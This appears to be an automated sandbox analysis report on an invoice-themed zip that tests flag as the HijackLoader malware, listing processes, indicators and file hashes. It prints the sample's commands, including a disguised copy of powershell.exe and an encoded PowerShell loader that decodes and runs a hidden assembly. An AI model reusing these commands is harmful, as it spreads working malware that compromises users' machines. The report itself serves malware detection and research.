Analysis
-
max time kernel
96s -
max time network
146s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-10-2024 15:15
Static task
static1
Behavioral task
behavioral1
Sample
facturagm-27725407957355783426.zip
Resource
win11-20241007-en
General
-
Target
facturagm-27725407957355783426.zip
-
Size
49.2MB
-
MD5
79e9ed02ff9d617c1732776ff596f47a
-
SHA1
9e3dd3c140198fc5ff080dec7d610f5bb04d2e4a
-
SHA256
48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6
-
SHA512
7b418b82b6f8b7fb165ee2ca3a014ce94bd229a10d11fc141be8dea47a728e04670cfa795757d0ea6bf127db13952c4e4b1bc4ec3f25f623a5f108734b76d241
-
SSDEEP
1572864:4ltjOLVis6A90iwyhwLmWaBOZF+QLr45/rby0:4ltjORX9VnqaBOj96/Xy0
Malware Config
Signatures
-
Detects HijackLoader (aka IDAT Loader) 3 IoCs
resource yara_rule behavioral1/files/0x001c00000002aade-40.dat family_hijackloader behavioral1/files/0x001000000002abcf-372.dat family_hijackloader behavioral1/files/0x001900000002abd6-386.dat family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 276 cmd.exe 82 -
Executes dropped EXE 1 IoCs
pid Process 2840 facturagm-27725407957355783426.vbs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language facturagm-27725407957355783426.vbs.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ WScript.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2840 facturagm-27725407957355783426.vbs.exe 2840 facturagm-27725407957355783426.vbs.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeRestorePrivilege 416 7zG.exe Token: 35 416 7zG.exe Token: SeSecurityPrivilege 416 7zG.exe Token: SeSecurityPrivilege 416 7zG.exe Token: SeDebugPrivilege 2840 facturagm-27725407957355783426.vbs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 416 7zG.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3172 wrote to memory of 2840 3172 WScript.exe 85 PID 3172 wrote to memory of 2840 3172 WScript.exe 85 PID 3172 wrote to memory of 2840 3172 WScript.exe 85
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426.zip1⤵PID:3796
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4820
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\" -spe -an -ai#7zMap2430:140:7zEvent58071⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:416
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" -enc JABMAHcAZQBlAGcAagBqAGIAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABXAGsAZwBtAHcAawAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEwAdwBlAGUAZwBqAGoAYgBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBrAGcAbQB3AGsALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAFAAeAB6AHgAcgBrAGYAcQBiAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAApADsAJABLAGwAawBwAHUAZQBwAGMAZgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQARwBhAGkAdQBsACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFAAeAB6AHgAcgBrAGYAcQBiAG4ALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAYQBpAHUAbAAuAEMAbwBwAHkAVABvACgAIAAkAEsAbABrAHAAdQBlAHAAYwBmACAAKQA7ACQARwBhAGkAdQBsAC4AQwBsAG8AcwBlACgAKQA7ACQAUAB4AHoAeAByAGsAZgBxAGIAbgAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAE0AaABoAGgAawB6AGcAZQBuAHQAIAA9ACAAJABLAGwAawBwAHUAZQBwAGMAZgAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAEcAdQB2AGoAZwBvAHAAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQATQBoAGgAaABrAHoAZwBlAG4AdAApADsAIAAkAE8AcABkAGQAawAgAD0AIAAkAEcAdQB2AGoAZwBvAHAALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABPAHAAZABkAGsALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAE8AcABkAGQAawAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:4548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Managed\hgfs.dll
Filesize89KB
MD5a3ffaec3fd51d8bbf4c5f1575100b856
SHA1a7dbe003681b48c6075cdae3d4ff2dcbeb51311f
SHA256ff63474af99de3c2558228551cf869f01d77f96617cd40ef965691b984b96002
SHA51212197073f3c6f3475efc3ea1bb32958e37803e4be9ed0199bfe65cdbd458a73d95037c03ce6894624abcd37618f36ab4e8614df1cbca799caa5f17808440f5f5
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg
Filesize878KB
MD5dc93cc9611ad0f3955d945cb9fe49a2f
SHA14097a79a913448879ed22f79524fd0bc2fc4d542
SHA2565f258c49d628f1feae9a2e6c446f2ea785c329f86705a324e0d077e832132d88
SHA5127e84542818e10baafbd07b13ca99f1f183e871acd276a67cd9d09b3e99b7d57ab86590e8d005a8c623b6b4a79baf2be34e7977af3eed85a4e223dec78ec10fd5
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\glib-2.0.dll
Filesize1.0MB
MD52c86ec2ba23eb138528d70eef98e9aaf
SHA1246846a3fe46df492f0887a31f7d52aae4faa71a
SHA256030983470da06708cc55fd6aca92df199a051922b580db5db55c8cb6b203b51b
SHA512396a3883fa65d7c3a0af7d607001a6099316a85563147cb34fa9806c9a4b39cfa90c7fa9eb4456399977eb47438d10896d25ed5327ae7aa3e3ae28cd1d13701c
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\msvcr90.dll
Filesize638KB
MD511d49148a302de4104ded6a92b78b0ed
SHA1fd58a091b39ed52611ade20a782ef58ac33012af
SHA256ceb0947d898bc2a55a50f092f5ed3f7be64ac1cd4661022eefd3edd4029213b0
SHA512fdc43b3ee38f7beb2375c953a29db8bcf66b73b78ccc04b147e26108f3b650c0a431b276853bb8e08167d34a8cc9c6b7918daef9ebc0a4833b1534c5afac75e4
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\sqlite.dll
Filesize243KB
MD596ea9810b13ae107a3efbc44452f1ddf
SHA1e4db1816f5a16f1ff4b8b90453a875a9c3aed3ea
SHA256794a456a593e50ecdbdb1c08687d9db7724db2597889883e9a32ee11ba0166cd
SHA5120ff49e5112bd48eed297554f0d971ab07266564f6bcc80bfa7dbb66629579f4f8bb5509c4390714990e8c5d7dfea261a5626a117c3061c66424879b0b6ea69a2
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg
Filesize1.2MB
MD55b23b0752f582a7ea16296a9238a568a
SHA1aebd7767b37a28d5eaab02f4b5f7e982441f9269
SHA25696d8470b767bce6fbc71e55c2c43980da104f9532f941e25e30ae3c8fb7b63e6
SHA5125f7a7d287916ba99acfabd074576f7d2db585d594e202739d2cd492b679ba1899cdc27c7c744f8314f6cf030f6d9ca7a841e7fea68e00bee7757b353d0eca330
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\vcruntime140.dll
Filesize106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\msvcp90.dll
Filesize557KB
MD590a32d8e07f7fb3d102eab1da28f0723
SHA10903911bbb5d00f68ba51895fa898b38a5453ded
SHA256004ed24507dc7307cec1a3732fa57eabf19e918c3e1b54561e6cc01f554c0b77
SHA5122c69586d5c5d2b4b5decf2bf479554c3d0ff5f5a6fbacb01b8583ea8d96d0ae9c850c30a0d43eb2ad1116be901578d15fe08fce3e505440c854082c208a79f1a
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\vcruntime140_1.dll
Filesize48KB
MD5cf0a1c4776ffe23ada5e570fc36e39fe
SHA12050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA2566fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\level4.resS
Filesize128KB
MD564d183ad524dfcd10a7c816fbca3333d
SHA15a180d5c1f42a0deaf475b7390755b3c0ecc951c
SHA2565a666340f42f0f985772024d90a83d15c9a241a68d58205cd4afbb1a31f1621a
SHA5123cab59dff09981f49d1070fba06a781439bb1ea2dae0cfcb937d9875bbe9e866be2c951cfc6a3ca4a92aea79dd3e9c4792a765f5a06f230a57dabcab2f0b3c1e
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\mozglue.dll
Filesize222KB
MD5536f3db0935e8a3e4a946cda6f641213
SHA10d59a21a15e3d7fdaed9549cae0d69b9bff3a1a3
SHA2563a8263b607897e6754604e08b62b088ab2443df57146dee8f709193c454cd573
SHA512016646f745d6ce3fa2e600dd3131805b7a0b1171fd5f59f53b9582128297c3a9bcd8ea20020fc1c2953f2cfe96b2e70d56a824b9e2bc2fc11422aec9243e66d4
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg
Filesize901KB
MD5f5287c9ac6523fa9afc2096a5bcea901
SHA1d9f5b46a8525ef7e90e9446a3b750677e5018718
SHA256518bc674a4855d72a0163972be3e9776358dd2806e69ff5c846efc8424c4463d
SHA512450bf0347f5098279bdb3b1f76951039bf59884d96107541e37ef3b3d3dd52bb1d3cf54451f8209ee6be79096bf6282fa0479f492e7e2a6dfa93a3c296b76bd6
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\msvcp140.dll
Filesize564KB
MD51ba6d1cf0508775096f9e121a24e5863
SHA1df552810d779476610da3c8b956cc921ed6c91ae
SHA25674892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA5129887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\vmtools.dll
Filesize617KB
MD565c3c2a741838474a592679cda346753
SHA1043d80766dd4e49d8dca6ac72b04e09b5491fdc9
SHA2564e5f2c54d9ecfe48999edfcce0de038948f8b20ff68e299c55d9a2d6f65713e8
SHA512e5d8b308586ffa914f46b6766217eb12ad759853d25108db06170b870d0e8947e2befabc2843f76cb864b0f0135a8f2163b7c93fe644b293789919d1d07c4079
-
Filesize
1.6MB
MD5ef631a2d714c4ea5480e40163f23344f
SHA15a32baa3072836e76ea12006fb9a9d69ec10a6f3
SHA25643f335930a2bb9df1e30bd3e8e10cab5bc4cd23c31b2db740c9649596821b4f1
SHA51278c078d20091344c0efd0e740e1045454e3b261318c1eb9056f51ec82abec8a99b21194fb7a096d350ec23f76a1719501694d4b2bf5801903635d62c1cafe703
-
C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe
Filesize411KB
MD5bc4535f575200446e698610c00e1483d
SHA178d990d776f078517696a2415375ac9ebdf5d49a
SHA25688e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717